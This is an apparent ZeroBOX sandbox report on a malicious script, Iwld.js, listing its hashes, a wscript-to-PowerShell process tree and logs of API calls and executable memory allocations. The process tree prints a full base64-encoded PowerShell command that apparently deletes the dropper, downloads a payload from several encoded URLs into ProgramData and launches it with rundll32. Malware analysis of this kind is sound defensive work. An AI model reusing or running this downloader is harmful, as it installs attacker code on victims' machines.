Summary | ZeroBOX

Iwld.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us May 26, 2023, 10:19 a.m. May 26, 2023, 10:22 a.m.
Size 200.0KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 f1ff2b591247ec783db79f060c7df292
SHA256 6d8abf32db588e3b6fcefe4f2b6628fcd16b074eb7c04f3fb0b03618a9672c25
CRC32 B299BC84
ssdeep 3072:Kf7n1Er4l1qDvatIVFcWwblWrj6/ns5JoDXn0Pns:Kf7nDDqDvatIVifQJorKs
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Iwld.js

    1932
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy

      2632
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="

        2740

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059afe0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059ada0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059ada0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059ada0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059ada0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059ada0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059ada0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0059b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02592000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02951000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02952000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ae9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

